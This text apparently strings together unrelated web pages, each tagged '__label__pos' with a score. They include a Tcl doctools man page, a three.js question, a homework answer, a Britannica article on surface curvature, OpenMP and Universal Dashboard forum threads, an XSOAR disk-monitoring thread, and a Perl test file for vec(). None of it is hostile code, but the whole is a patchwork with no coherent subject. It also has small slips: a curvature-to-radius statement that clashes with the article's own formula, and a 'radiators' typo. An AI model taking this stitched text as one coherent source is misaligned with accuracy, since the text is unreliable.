Scroll to navigation doctools::toc::import::json(3tcl) Documentation tools doctools::toc::import::json(3tcl) NAME doctools::toc::import::json - JSON import plugin SYNOPSIS package require Tcl 8.4 package require doctools::toc::import::json ?0.1? package require doctools::toc::structure package require json import string configuration DESCRIPTION This package implements the doctools table of contents import plugin for the parsing of JSON markup. This is an internal package of doctools, for use by the higher level management packages handling tables of contents, especially doctools::toc::import, the import manager. Using it from a regular interpreter is possible, however only with contortions, and is not recommended. The proper way to use this functionality is through the package doctools::toc::import and the import manager objects it provides. API The API provided by this package satisfies the specification of the doctoc import plugin API version 2. import string configuration This command takes the string and parses it as JSON markup encoding a table of contents, in the context of the specified configuration (a dictionary). The result of the command is the canonical serialization of that table of contents, in the form specified in section ToC serialization format. JSON NOTATION OF TABLES OF CONTENTS The JSON format used for tables of contents is a direct translation of the ToC serialization format, mapping Tcl dictionaries as JSON objects and Tcl lists as JSON arrays. For example, the Tcl serialization doctools::toc { items { {reference { desc {DocTools - Tables of Contents} id introduction.man label doctools::toc::introduction }} {division { id processing.man items { {reference { desc {doctoc serialization utilities} id structure.man label doctools::toc::structure }} {reference { desc {Parsing text in doctoc format} id parse.man label doctools::toc::parse }} } label Processing }} } label {Table of Contents} title TOC } is equivalent to the JSON string { "doctools::toc" : { "items" : [{ "reference" : { "desc" : "DocTools - Tables of Contents", "id" : "introduction.man", "label" : "doctools::toc::introduction" } },{ "division" : { "id" : "processing.man", "items" : [{ "reference" : { "desc" : "doctoc serialization utilities", "id" : "structure.man", "label" : "doctools::toc::structure" } },{ "reference" : { "desc" : "Parsing text in doctoc format", "id" : "parse.man", "label" : "doctools::toc::parse" } }], "label" : "Processing" } }], "label" : "Table of Contents", "title" : "TOC" } } TOC SERIALIZATION FORMAT Here we specify the format used by the doctools v2 packages to serialize tables of contents as immutable values for transport, comparison, etc. We distinguish between regular and canonical serializations. While a table of contents may have more than one regular serialization only exactly one of them will be canonical. regular serialization [1] The serialization of any table of contents is a nested Tcl dictionary. [2] This dictionary holds a single key, doctools::toc, and its value. This value holds the contents of the table of contents. [3] The contents of the table of contents are a Tcl dictionary holding the title of the table of contents, a label, and its elements. The relevant keys and their values are title The value is a string containing the title of the table of contents. label The value is a string containing a label for the table of contents. items The value is a Tcl list holding the elements of the table, in the order they are to be shown. Each element is a Tcl list holding the type of the item, and its description, in this order. An alternative description would be that it is a Tcl dictionary holding a single key, the item type, mapped to the item description. The two legal item types and their descriptions are reference This item describes a single entry in the table of contents, referencing a single document. To this end its value is a Tcl dictionary containing an id for the referenced document, a label, and a longer textual description which can be associated with the entry. The relevant keys and their values are id The value is a string containing the id of the document associated with the entry. label The value is a string containing a label for this entry. This string also identifies the entry, and no two entries (references and divisions) in the containing list are allowed to have the same label. desc The value is a string containing a longer description for this entry. division This item describes a group of entries in the table of contents, inducing a hierarchy of entries. To this end its value is a Tcl dictionary containing a label for the group, an optional id to a document for the whole group, and the list of entries in the group. The relevant keys and their values are id The value is a string containing the id of the document associated with the whole group. This key is optional. label The value is a string containing a label for the group. This string also identifies the entry, and no two entries (references and divisions) in the containing list are allowed to have the same label. items The value is a Tcl list holding the elements of the group, in the order they are to be shown. This list has the same structure as the value for the keyword items used to describe the whole table of contents, see above. This closes the recusrive definition of the structure, with divisions holding the same type of elements as the whole table of contents, including other divisions. canonical serialization The canonical serialization of a table of contents has the format as specified in the previous item, and then additionally satisfies the constraints below, which make it unique among all the possible serializations of this table of contents. [1] The keys found in all the nested Tcl dictionaries are sorted in ascending dictionary order, as generated by Tcl's builtin command lsort -increasing -dict. BUGS, IDEAS, FEEDBACK This document, and the package it describes, will undoubtedly contain bugs and other problems. Please report such in the category doctools of the Tcllib Trackers [http://core.tcl.tk/tcllib/reportlist]. Please also report any ideas for enhancements you may have for either package and/or documentation. When proposing code changes, please provide unified diffs, i.e the output of diff -u. Note further that attachments are strongly preferred over inlined patches. Attachments can be made by going to the Edit form of the ticket immediately after its creation, and then using the left-most button in the secondary navigation bar. KEYWORDS JSON, deserialization, doctools, import, table of contents, toc CATEGORY Text formatter plugin COPYRIGHT Copyright (c) 2009 Andreas Kupries <[email protected]> 0.1 tcllib
__label__pos
0.952921
How do I custom mouse action in orbit controls or use another to do something like this example I want to do something like this example. I need to custom mouse action like the above example: • drag up or drag down to pan(zoom in/out) the map • drag left or drag right to left to rotate the map I used Orbit controls but it only allows to use left mouse to pan and the right mouse to rotate. I can’t use the left mouse for both zoom actions and rotate action like the above example. I read the docs but it only allows custom the mouse buttons controls.mouseButtons = { LEFT: THREE.MOUSE.ROTATE, MIDDLE: THREE.MOUSE.DOLLY, RIGHT: THREE.MOUSE.PAN } I want to custom mouse action in three.js examples like the above example. Everyone who has experience please help me. Thank you very much
__label__pos
0.971689
Get-UDElement on custom component? So @adam kindly pointed me to how to achieve allowing get-udelement on a custom component…except I cannot figure out or debug why this doesn’t work:- import React from 'react'; import BeautyStars from 'beauty-stars'; class <%=$PLASTER_PARAM_ControlName%> extends React.Component { // state is for keeping control state before or after changes. state = { //value: 0 } constructor(props) { super(props); this.state = { value: 0 } } onIncomingEvent(eventName, event) { if (event.type === "requestState") { UniversalDashboard.post(`/api/internal/component/element/sessionState/${event.requestId}`, { attributes: { value: this.state.value } }); } } onChanged(t) { this.setState({ value: t.target.value }); if (this.props.onChange == null) { return } var val = t.target.value; UniversalDashboard.publish('element-event', { type: "clientEvent", eventId: this.props.onChange, eventName: 'onChange', eventData: val.toString() }); } render() { return ( <BeautyStars value={this.state.value} onChange={value => this.setState({ value })} /> ); } } export default <%=$PLASTER_PARAM_ControlName%> can you post new code example without all the plaster template things… and i see your problem Like this buddy? https://paste.ofcode.org/X5Azq2VeKDDvAccumJLBgE import { useEffect, useState, useCallback } from "react"; const SET_STATE = "setState"; const REQUEST_STATE = "requestState"; const REMOVE_ELEMENT = "removeElement"; const ADD_ELEMENT = "addElement"; const CLEAR_ELEMENT = "clearElement"; const SYNC_ELEMENT = "syncElement"; export default function useDashboardEvent(elementId, initialState) { const { content, ...attributes } = initialState; const [state, setState] = useState({ content: content, attributes: attributes }); useEffect(() => { // console.log('UniversalDashboard Object: ', UniversalDashboard) // console.log("ud event hook: ", state); const pubSubToken = UniversalDashboard.subscribe(elementId, events); return () => UniversalDashboard.unsubscribe(pubSubToken); }, [elementId, initialState]); const events = useCallback( (msg, event) => { switch (event.type) { // Set-UDElement case SET_STATE: setState(state => { return { attributes: { ...state.attributes, ...event.state.attributes }, content: event.state.content ? (Array.isArray(event.state.content) ? event.state.content : Array.from(event.state.content)) : [] } }); break; // Get-UDElement case REQUEST_STATE: UniversalDashboard.post( `/api/internal/component/element/sessionState/${event.requestId}`, { ...state } ); break; // Add-UDElement case ADD_ELEMENT: setState(state => { return { ...state, content: state.content.concat(event.elements) }; }); break; // Remove-UDElement case REMOVE_ELEMENT: setState(state => { let newStateContent = state.content; newStateContent.splice(-1, 1); return { ...state, content: [...newStateContent] }; }); break; // Clear-UDElement case CLEAR_ELEMENT: setState(state => { return { ...state, content: [] }; }); break; // Sync-UDElement case SYNC_ELEMENT: reload(); break; // Just break default: break; } }, [event] ); const reload = useCallback(() => { UniversalDashboard.get( `/api/internal/component/element/${elementId}`, data => setState(state => { return { ...state, content: data }; }) ); }, [elementId]); return [state, reload, setState]; } This is a custom react hook that i’ve created , it take care of all ud events so copy this content to new file now the second step in your component add this line import useDashboardEvent from "../Hooks/useDashboardEvent"; step 3 inside your component add thus lines const [state, reload] = useDashboardEvent(props.id, props); const { content, attributes } = state; example code for onChange const onChange = event => { UniversalDashboard.publish("element-event", { type: "clientEvent", eventId: attributes.id + "onChange", eventName: "onChange", eventData: event }); }; example of the switch component return <Switch {...attributes} {...customIcons} checked={checked} onChange={onChange} /> ); Example of the full UDAntd Switch component import React, { useState } from "react"; import { Switch } from "antd"; import useDashboardEvent from "../Hooks/useDashboardEvent"; const AntdSwitch = props => { const [state, reload] = useDashboardEvent(props.id, props); const { content, attributes } = state; const [checked, setChecked] = useState(attributes.checked) const onChange = event => { setChecked(!checked) UniversalDashboard.publish("element-event", { type: "clientEvent", eventId: attributes.id + "onChange", eventName: "onChange", eventData: event }); }; const customIcons = { checkedChildren: UniversalDashboard.renderComponent(attributes.checkedChildren), unCheckedChildren: UniversalDashboard.renderComponent(attributes.unCheckedChildren) } return ( <Switch {...attributes} {...customIcons} checked={checked} onChange={onChange} /> ); }; export default AntdSwitch; the powershell command file look like this function New-UDAntdSwitch { param( [Parameter()] [string]$Id = (New-Guid).ToString(), [Parameter()] [string]$ClassName, [Parameter()] [switch]$autoFocus, [Parameter()] [switch]$checked, [Parameter()] [object]$checkedChildren, [Parameter()] [switch]$defaultChecked, [Parameter()] [switch]$disabled, [Parameter()] [switch]$loading, [Parameter()] [ValidateSet("default","small","large")] [string]$size, [Parameter()] [object]$unCheckedChildren, [Parameter()] [object]$onChange, [Parameter()] [hashtable]$Style ) End { if ($null -ne $OnClick) { if ($OnClick -is [scriptblock]) { $OnClick = New-UDEndpoint -Endpoint $OnClick -Id ($Id + "onClick") } elseif ($OnClick -isnot [UniversalDashboard.Models.Endpoint]) { throw "OnClick must be a script block or UDEndpoint" } } if ($null -ne $onChange) { if ($onChange -is [scriptblock]) { $onChange = New-UDEndpoint -Endpoint $onChange -Id ($Id + "onChange") } elseif ($onChange -isnot [UniversalDashboard.Models.Endpoint]) { throw "OnClick must be a script block or UDEndpoint" } } @{ assetId = $AssetId isPlugin = $true type = "ud-antd-switch" id = $Id className = $ClassName autoFocus = $AutoFocus.IsPresent checked = $Checked.IsPresent checkedChildren = $CheckedChildren defaultChecked = $DefaultChecked.IsPresent disabled = $Disabled.IsPresent loading = $Loading.IsPresent size = $Size unCheckedChildren = $UnCheckedChildren # onChange = $OnChange # onClick = $OnClick style = $Style } } } 2 Likes Thanks @AlonGvili for sharing this code and explaining how to do this. It’s really, really appreciated as I only ask for help when I have tried all avenues I can think of, so to get a reply with an answer is great :smile: will make sure I review this and apply, as need to build this into all custom components essentially to get the most out of them interacting with universal dashboard? 2 Likes Ok so I copied and pasted the custom hook you created into its own file, and saved that as “useDashboardEvent.jsx” in a folder called “Hooks” in the main component folder…then done the following in the script:- import React from 'react'; import BeautyStars from 'beauty-stars'; import useDashboardEvent from "../Hooks/useDashboardEvent"; class <%=$PLASTER_PARAM_ControlName%> extends React.Component { constructor(props) { super(props); this.state = { value: 0 } } render() { const [state, reload] = useDashboardEvent(props.id, props); const { content, attributes } = state; const onChange = event => { value => this.setState({ value }) UniversalDashboard.publish("element-event", { type: "clientEvent", eventId: attributes.id + "onChange", eventName: "onChange", eventData: event }); }; return ( <BeautyStars value={this.state.value} onChange={onChange} /> ); } } export default <%=$PLASTER_PARAM_ControlName%> But on the output of the build I get:- Version: webpack 4.30.0 Time: 4243ms Built at: 10/16/2019 10:18:37 PM 2 assets Entrypoint index = index.0b520ba5aa6630172432.bundle.js index.0b520ba5aa6630172432.bundle.map [3] ./components/index.js + 2 modules 7.62 KiB {0} [built] | 3 modules + 3 hidden modules ERROR in ./components/udstar.jsx Module not found: Error: Can’t resolve ‘…/Hooks/useDashboardEvent’ in 'C:\ud\UDStar\udrate\src\components’ @ ./components/udstar.jsx 29:0-59 53:31-48 @ ./components/index.js npm ERR! code ELIFECYCLE npm ERR! errno 2 npm ERR! [email protected] build: webpack -p --env production npm ERR! Exit status 2 npm ERR! npm ERR! Failed at the [email protected] build script. npm ERR! This is probably not a problem with npm. There is likely additional logging output above. npm ERR! A complete log of this run can be found in: npm ERR! C:\Users\Adz\AppData\Roaming\npm-cache_logs\2019-10-16T21_18_37_309Z-debug.log Copy-Item : Cannot find path ‘C:\ud\UDStar\udrate\src\public’ because it does not exist. At C:\ud\UDStar\udrate\src\build.ps1:21 char:1 • Copy-Item $BuildFolder\public*.bundle.js $OutputPath Can you add some baby steps for me please? :baby: :baby_bottle: I did try quite a few other copy and paste into my component.jsx file from the code you kindly provided @AlonGvili , but the code I posted is the closet it got to building I could get :cry: First you can NOT used react hooks inside a Class component only in functions const AntdSwitch = props => { const [state, reload] = useDashboardEvent(props.id, props); const { content, attributes } = state; const [checked, setChecked] = useState(attributes.checked) const onChange = event => { setChecked(!checked) UniversalDashboard.publish("element-event", { type: "clientEvent", eventId: attributes.id + "onChange", eventName: "onChange", eventData: event }); }; const customIcons = { checkedChildren: UniversalDashboard.renderComponent(attributes.checkedChildren), unCheckedChildren: UniversalDashboard.renderComponent(attributes.unCheckedChildren) } return ( <Switch {...attributes} {...customIcons} checked={checked} onChange={onChange} /> ); }; export default AntdSwitch; as you can see in this example code i use a function NOT a class Second if you file is in the same folder as the Hooks folder replace import useDashboardEvent from "../Hooks/useDashboardEvent"; with import useDashboardEvent from "./Hooks/useDashboardEvent"; Please create a github repo with all your code folders and files so i can help you Many thanks again @AlonGvili I will upload this to github and let you know when on there. Will try and have a few more goes with the helpful information you provided I created GH Repo of what i think is a good starting point to build custom control. clone the repo see if this help you 1 Like Sweet @AlonGvili. After your words of advice changed it from a class to a function and it built without errors. Which was great, but sadly I got a minified react error. It was half midnight by then so went to bed. I will make time today to look at this further help you have provided. Thanks again man means a lot Thanks again man looking at this now…first build failed…so on to attempt 2 :smiley: sorry man still struggling, I ended up opting for the original build method, as mentioned was getting some compiling errors…but with the new-found knowledge you gave me I came up with this:- https://github.com/psDevUK/UDscripts/blob/master/udrate.jsx but seems the this.onChanged.bind(this) is not quite working as removing that allows me to use the component, but I want to record what the current value is…help please… Ok as not web developer, totally forgot to look at debugger in browser…Doh! saying e.target not defined…so guess thats why nothing is happening…will try your method again as bit baffled buy this… I will create you a demo with your control, when I get back home 1 Like Just to show my appreciation man I made you a special custom component myself tonight:- alon Old skool type-writer :slight_smile: 2 Likes Love it!!! sooo coool 1 Like I send you PR with the full source code for UDRate module 1 Like Well I was getting all frustrated not being able to do the element support, so as you kindly said you would do me a PR which you did do, thought I need to show Alon how muchyou have inspired me. So this was the best I could come up with before I needed to get some sleep after a tough long week in the office. I have just approved your PR whilst having my first cup of Yorskshire Tea for the day…will make sure I study and learn this, to then apply this same technique to other custom components. Thanks again @AlonGvili OMG only 25 lines of code! I was obviously over-complicating things…can you explain the setValue(newstar) like the newstar bit I don’t see that documented anywhere as an official property object. So is this a variable you create on the fly to describe what it is doing yeah? Wow const [value, setValue] = useState(0) it’s all starting to click in my head how this all comes together :smiley: const [value, setValue] = useState(0) Its a react hook, instead of all the setState in a class component you just writing one line in the new react version 1 Like
__label__pos
0.97271
> > a company made 2700 radios last months. a company made 2700 radios last months. If 1% of them were defective, how many defective radios were produced? 190 Views a company made 2700 radios last months. If 1% of them were defective, how many defective radios were produced? Answer 2700/100 = 27. Therefore, 1% = 27. 27 defective radiators were produced To see more answers head over to College Study Guides Virtual Teaching Assistant: Colleen R. Question Level: Basic Karma: Free Upload Date: 5/31/2017 This 19 words question was answered by Colleen R. on StudySoup on 5/31/2017. The question contains content related to Business Since its upload, it has received 190 views. Recommended Questions
__label__pos
0.689826
Gets or sets a value of type IgnoreCaseSettings determining if and how the case of a word is ignored while spell checking. The default value is AllUpper | WordBeginUpper. Syntax public Proofing.TXSpell.IgnoreCaseSettings IgnoreCase { get; set; } Public Property IgnoreCase() As Proofing.TXSpell.IgnoreCaseSettings Remarks The IgnoreCaseSettings enumeration values Always, Never, WordBegin and WordBeginUpper must not be combined among one another, but can be combined with AllLower and/or AllUpper. For all other combinations an exception is thrown.
__label__pos
0.840452
Curvature of surfaces To measure the curvature of a surface at a point, Euler, in 1760, looked at cross sections of the surface made by planes that contain the line perpendicular (or “normal”) to the surface at the point (see figure). Euler called the curvatures of these cross sections the normal curvatures of the surface at the point. For example, on a right cylinder of radius r, the vertical cross sections are straight lines and thus have zero curvature; the horizontal cross sections are circles, which have curvature 1/r. The normal curvatures at a point on a surface are generally different in different directions. The maximum and minimum normal curvatures at a point on a surface are called the principal (normal) curvatures, and the directions in which these normal curvatures occur are called the principal directions. Euler proved that for most surfaces where the normal curvatures are not constant (for example, the cylinder), these principal directions are perpendicular to each other. (Note that on a sphere all the normal curvatures are the same and thus all are principal curvatures.) These principal normal curvatures are a measure of how “curvy” the surface is. The theory of surfaces and principal normal curvatures was extensively developed by French geometers led by Gaspard Monge (1746–1818). It was in an 1827 paper, however, that the German mathematician Carl Friedrich Gauss made the big breakthrough that allowed differential geometry to answer the question raised above of whether the annular strip is isometric to the strake. The Gaussian curvature of a surface at a point is defined as the product of the two principal normal curvatures; it is said to be positive if the principal normal curvatures curve in the same direction and negative if they curve in opposite directions. Normal curvatures for a plane surface are all zero, and thus the Gaussian curvature of a plane is zero. For a cylinder of radius r, the minimum normal curvature is zero (along the vertical straight lines), and the maximum is 1/r (along the horizontal circles). Thus, the Gaussian curvature of a cylinder is also zero. If the cylinder is cut along one of the vertical straight lines, the resulting surface can be flattened (without stretching) onto a rectangle. In differential geometry, it is said that the plane and cylinder are locally isometric. These are special cases of two important theorems: • Gauss’s “Remarkable Theorem” (1827). If two smooth surfaces are isometric, then the two surfaces have the same Gaussian curvature at corresponding points. (Athough defined extrinsically, Gaussian curvature is an intrinsic notion.) • Minding’s theorem (1839). Two smooth (“cornerless”) surfaces with the same constant Gaussian curvature are locally isometric. As corollaries to these theorems: • A surface with constant positive Gaussian curvature c has locally the same intrinsic geometry as a sphere of radius 1/c. (This is because a sphere of radius r has Gaussian curvature 1/r2). • A surface with constant zero Gaussian curvature has locally the same intrinsic geometry as a plane. (Such surfaces are called developable). • A surface with constant negative Gaussian curvature c has locally the same intrinsic geometry as a hyperbolic plane. (See non-Euclidean geometry.) The Gaussian curvature of an annular strip (being in the plane) is constantly zero. So to answer whether or not the annular strip is isometric to the strake, one needs only to check whether a strake has constant zero Gaussian curvature. The Gaussian curvature of a strake is actually negative, hence the annular strip must be stretched—although this can be minimized by narrowing the shapes. Shortest paths on a surface From an outside, or extrinsic, perspective, no curve on a sphere is straight. Nevertheless, the great circles are intrinsically straight—an ant crawling along a great circle does not turn or curve with respect to the surface. About 1830 the Estonian mathematician Ferdinand Minding defined a curve on a surface to be a geodesic if it is intrinsically straight—that is, if there is no identifiable curvature from within the surface. A major task of differential geometry is to determine the geodesics on a surface. The great circles are the geodesics on a sphere. A great circle arc that is longer than a half circle is intrinsically straight on the sphere, but it is not the shortest distance between its endpoints. On the other hand, the shortest path in a surface is not always straight, as shown in the figure. An important theorem is: On a surface which is complete (every geodesic can be extended indefinitely) and smooth, every shortest curve is intrinsically straight and every intrinsically straight curve is the shortest curve between nearby points. What made you want to look up differential geometry? (Please limit to 900 characters) Please select the sections you want to print Select All MLA style: "differential geometry". Encyclopædia Britannica. Encyclopædia Britannica Online. Encyclopædia Britannica Inc., 2015. Web. 27 Apr. 2015 <http://www.britannica.com/EBchecked/topic/162938/differential-geometry/235557/Curvature-of-surfaces>. APA style: differential geometry. (2015). In Encyclopædia Britannica. Retrieved from http://www.britannica.com/EBchecked/topic/162938/differential-geometry/235557/Curvature-of-surfaces Harvard style: differential geometry. 2015. Encyclopædia Britannica Online. Retrieved 27 April, 2015, from http://www.britannica.com/EBchecked/topic/162938/differential-geometry/235557/Curvature-of-surfaces Chicago Manual of Style: Encyclopædia Britannica Online, s. v. "differential geometry", accessed April 27, 2015, http://www.britannica.com/EBchecked/topic/162938/differential-geometry/235557/Curvature-of-surfaces. While every effort has been made to follow citation style rules, there may be some discrepancies. Please refer to the appropriate style manual or other sources if you have any questions. Click anywhere inside the article to add text or insert superscripts, subscripts, and special characters. You can also highlight a section and use the tools in this bar to modify existing content: We welcome suggested improvements to any of our articles. You can make it easier for us to review and, hopefully, publish your contribution by keeping a few points in mind: 1. Encyclopaedia Britannica articles are written in a neutral, objective tone for a general audience. 2. You may find it helpful to search within the site to see how similar or related subjects are covered. 3. Any text you add should be original, not copied from other sources. 4. At the bottom of the article, feel free to list any sources that support your changes, so that we can fully understand their context. (Internet URLs are best.) Your contribution may be further edited by our staff, and its publication is subject to our final approval. Unfortunately, our editorial approach may not be able to accommodate all contributions. MEDIA FOR: differential geometry Citation • MLA • APA • Harvard • Chicago Email You have successfully emailed this. Error when sending the email. Try again later. Or click Continue to submit anonymously: Continue
__label__pos
0.768508
How to monitor system performance-disk in XSOAR 6.12 cancel Showing results for  Show  only  | Search instead for  Did you mean:  Announcements How to monitor system performance-disk in XSOAR 6.12 L2 Linker We want to monitor server performance in real time for that we are using default dashboard named "System Health". But in that we are not able to monitor disk. Our server is on Prem and its version of xsoar is 6.12. Please assist quickly. 3 REPLIES 3 L2 Linker Please someone support on this. L1 Bithead Hi @assubramania Have you tried the following content pack? If not, please give it a try. https://cortex.marketplace.pan.dev/marketplace/details/HealthCheck/ Also, you can always use any APM solution (free or paid) to monitor your on-prem environment in real time. L1 Bithead To monitor system performance, including disk usage, in Cortex XSOAR 6.12, you can also set up custom monitoring using scripts and dashboards. Since the default "System Health" dashboard may not include disk monitoring, you can create your own dashboard or enhance the existing one through a custom script (automation) using the "psutil" Python library for example. Then you can create a Job to run the script periodically or you may create a custom Dashboard to display disk usage:   import psutil def main(): # Get disk usage statistics disk_usage = psutil.disk_usage('/') # Prepare the results results = { 'Total': disk_usage.total, 'Used': disk_usage.used, 'Free': disk_usage.free, 'Percent': disk_usage.percent } # Return the results to XSOAR context demisto.results({ 'Type': entryTypes['note'], 'ContentsFormat': formats['json'], 'Contents': results, 'EntryContext': { 'DiskUsage': results } }) if __name__ in ('__main__', '__builtin__', 'builtins'): main()   • 296 Views • 3 replies • 0 Likes Like what you see? Show your appreciation! Click Like if a post is helpful to you or if you just want to show your support. Click Accept as Solution to acknowledge that the answer to your question has been provided. The button appears next to the replies on topics you’ve started. The member who gave the solution and all future visitors to this topic will appreciate it! These simple actions take just seconds of your time, but go a long way in showing appreciation for community members and the LIVEcommunity as a whole! The LIVEcommunity thanks you for your participation!
__label__pos
0.604231
Strange behavior in a parallelized loop General OpenMP discussion Strange behavior in a parallelized loop Postby yurytsoy » Thu Apr 12, 2012 10:19 pm Hi, everybody! There is a code, which works very strange to me (this is to model some situation elsewhere, so it doesn't have much sense, but it works in an unexpected manner): Code: Select all #include <iostream> #include <vector> using namespace std; const int SIZE = 5000; class Fitness { public:    float value;    Fitness (float val) {       value = val;    } }; Fitness* func2(float* mas) {    float res = 0;    for (int i=0; i<SIZE; ++i) {       res += mas[i];    }    return new Fitness (res); } void func(float**); int main () {    float** mas = new float*[SIZE];    for (int i=0; i<SIZE; ++i) {       mas[i] = new float[SIZE];       for (int j=0; j<SIZE; ++j) {          mas[i][j] = i;   // each row simply contains all elements equal to the row's index.       }    }    func (mas);    for (int i=0; i<SIZE; ++i)       delete[] mas[i];    delete[] mas;    return 0; } void func (float** mas) {    int size = 10;    Fitness** fits = new Fitness*[SIZE]; #pragma omp parallel for shared(fits, SIZE, mas)    for (int i = 0; i < SIZE; i++) {       fits[i] = func2(mas[i]); #pragma omp critical       {          if (i != 0) {             cout<<i<<"\t"<<fits[i]->value<<"\t"<<fits[i]->value / i<<"\n";    // should always print SIZE in the last column          } else {             cout<<i<<"\t"<<fits[i]->value<<"\n";          }       }    }    for (int i=0; i<SIZE; ++i) delete fits[i];    delete[] fits; } The problem is that the line for checking correctness of the func function doesn't always prints SIZE, but sometimes (~15-20%) something very close to it, like 4999.9 or 5000.1 (if SIZE is 5000). The problem doesn't emerge when SIZE is rather small (10, 100, 1000), but it's there for SIZE > 5000. I can't understand it at all neither can find any potential explanation. Could anyone please help me out what I'm missing here? Thanks a lot! Yury yurytsoy   Re: Strange behavior in a parallelized loop Postby MarkB » Fri Apr 13, 2012 7:25 am This is just a loss of precision problem in floating point arithmetic: by the time the row sums are large enough (around 10^7), they can no longer be represented at full accuracy in a float type. If you use doubles instead of floats you should see the problem go away (at least for SIZE = 5000). This is nothing to do with OpenMP or parallelism, by the way: the problem is just the same in the sequential code. MarkB   Posts: 698 Joined: Thu Jan 08, 2009 10:12 am Location: EPCC, University of Edinburgh Re: Strange behavior in a parallelized loop Postby yurytsoy » Fri Apr 13, 2012 9:50 pm Oops, that was really a lame mistake of mine. Thanks! yurytsoy   Return to Using OpenMP Who is online Users browsing this forum: Google [Bot] and 5 guests
__label__pos
0.94822
This is a live mirror of the Perl 5 development currently hosted at https://github.com/perl/perl5 [perl #128260] Fix \substr %h [perl5.git] / t / op / vec.t CommitLineData a687059c LW 1#!./perl 2 60ab2483 SP 3BEGIN { 4 chdir 't' if -d 't'; 6b0e82e1 5 require './test.pl'; 43ece5b1 6 set_up_inc('../lib'); 60ab2483 SP 7} 8 33a10326 9plan( tests => 37 ); a687059c 10 210db7fc 11 60ab2483 12is(vec($foo,0,1), 0); 9f621bb0 13is(length($foo), undef); a687059c 14vec($foo,0,1) = 1; 60ab2483 SP 15is(length($foo), 1); 16is(unpack('C',$foo), 1); 17is(vec($foo,0,1), 1); a687059c 18 60ab2483 19is(vec($foo,20,1), 0); a687059c 20vec($foo,20,1) = 1; 60ab2483 SP 21is(vec($foo,20,1), 1); 22is(length($foo), 3); 23is(vec($foo,1,8), 0); a687059c 24vec($foo,1,8) = 0xf1; 60ab2483 SP 25is(vec($foo,1,8), 0xf1); 26is((unpack('C',substr($foo,1,1)) & 255), 0xf1); 27is(vec($foo,2,4), 1);; 28is(vec($foo,3,4), 15); deb3007b 29vec($Vec, 0, 32) = 0xbaddacab; 60ab2483 SP 30is($Vec, "\xba\xdd\xac\xab"); 31is(vec($Vec, 0, 32), 3135089835); a687059c 32 4ebbc975 GS 33# ensure vec() handles numericalness correctly 34$foo = $bar = $baz = 0; 35vec($foo = 0,0,1) = 1; 36vec($bar = 0,1,1) = 1; 37$baz = $foo | $bar; 60ab2483 SP 38ok($foo eq "1" && $foo == 1); 39ok($bar eq "2" && $bar == 2); 40ok("$foo $bar $baz" eq "1 2 3"); fe58ced6 MG 41 42# error cases 43 44$x = eval { vec $foo, 0, 3 }; 5a2b2173 45like($@, qr/^Illegal number of bits in vec/); 60ab2483 46$@ = undef; fe58ced6 47$x = eval { vec $foo, 0, 0 }; 5a2b2173 48like($@, qr/^Illegal number of bits in vec/); 60ab2483 49$@ = undef; fe58ced6 50$x = eval { vec $foo, 0, -13 }; 5a2b2173 51like($@, qr/^Illegal number of bits in vec/); 60ab2483 52$@ = undef; fe58ced6 53$x = eval { vec($foo, -1, 4) = 2 }; 5a2b2173 54like($@, qr/^Negative offset to vec in lvalue context/); 60ab2483 SP 55$@ = undef; 56ok(! vec('abcd', 7, 8)); 246fae53 MG 57 58# UTF8 59# N.B. currently curiously coded to circumvent bugs elswhere in UTF8 handling 60 61$foo = "\x{100}" . "\xff\xfe"; 62$x = substr $foo, 1; 60ab2483 SP 63is(vec($x, 0, 8), 255); 64$@ = undef; 246fae53 65eval { vec($foo, 1, 8) }; 60ab2483 SP 66ok(! $@); 67$@ = undef; 246fae53 68eval { vec($foo, 1, 8) = 13 }; 60ab2483 69ok(! $@); 83bcbc61 70if ($::IS_EBCDIC) { 60ab2483 71 is($foo, "\x8c\x0d\xff\x8a\x69"); 210db7fc PP 72} 73else { 60ab2483 74 is($foo, "\xc4\x0d\xc3\xbf\xc3\xbe"); 210db7fc 75} 33b45480 76$foo = "\x{100}" . "\xff\xfe"; 246fae53 MG 77$x = substr $foo, 1; 78vec($x, 2, 4) = 7; 60ab2483 79is($x, "\xff\xf7"); 246fae53 MG 80 81# mixed magic 82 83$foo = "\x61\x62\x63\x64\x65\x66"; 60ab2483 84is(vec(substr($foo, 2, 2), 0, 16), 25444); 246fae53 85vec(substr($foo, 1,3), 5, 4) = 3; 60ab2483 86is($foo, "\x61\x62\x63\x34\x65\x66"); 24aef97f HS 87 88# A variation of [perl #20933] 89{ 90 my $s = ""; 91 vec($s, 0, 1) = 0; 92 vec($s, 1, 1) = 1; 93 my @r; 94 $r[$_] = \ vec $s, $_, 1 for (0, 1); 60ab2483 95 ok(!(${ $r[0] } != 0 || ${ $r[1] } != 1)); 24aef97f 96} 0607bed5 EB 97 98 99my $destroyed; 100{ package Class; DESTROY { ++$destroyed; } } 101 102$destroyed = 0; 103{ 104 my $x = ''; 105 vec($x,0,1) = 0; 106 $x = bless({}, 'Class'); 107} 2154eca7 108is($destroyed, 1, 'Timely scalar destruction with lvalue vec'); ee3818ca 109 2484f8db FC 110use constant roref => \1; 111eval { for (roref) { vec($_,0,1) = 1 } }; ee3818ca FC 112like($@, qr/^Modification of a read-only value attempted at /, 113 'err msg when modifying read-only refs'); fc9668ae DM 114 115 116{ 117 # downgradeable utf8 strings should be downgraded before accessing 118 # the byte string. 119 # See the p5p thread with Message-ID: 120 # <CAMx+QJ6SAv05nmpnc7bmp0Wo+sjcx=ssxCcE-P_PZ8HDuCQd9A@mail.gmail.com> 121 122 123 my $x = substr "\x{100}\xff\xfe", 1; # a utf8 string with all ords < 256 124 my $v; 125 $v = vec($x, 0, 8); 126 is($v, 255, "downgraded utf8 try 1"); 127 $v = vec($x, 0, 8); 128 is($v, 255, "downgraded utf8 try 2"); 129} 33a10326 FC 130 131# [perl #128260] assertion failure with \vec %h, \vec @h 132{ 133 my %h = 1..100; 134 my @a = 1..100; 135 is ${\vec %h, 0, 1}, vec(scalar %h, 0, 1), '\vec %h'; 136 is ${\vec @a, 0, 1}, vec(scalar @a, 0, 1), '\vec @a'; 137}
__label__pos
0.903766
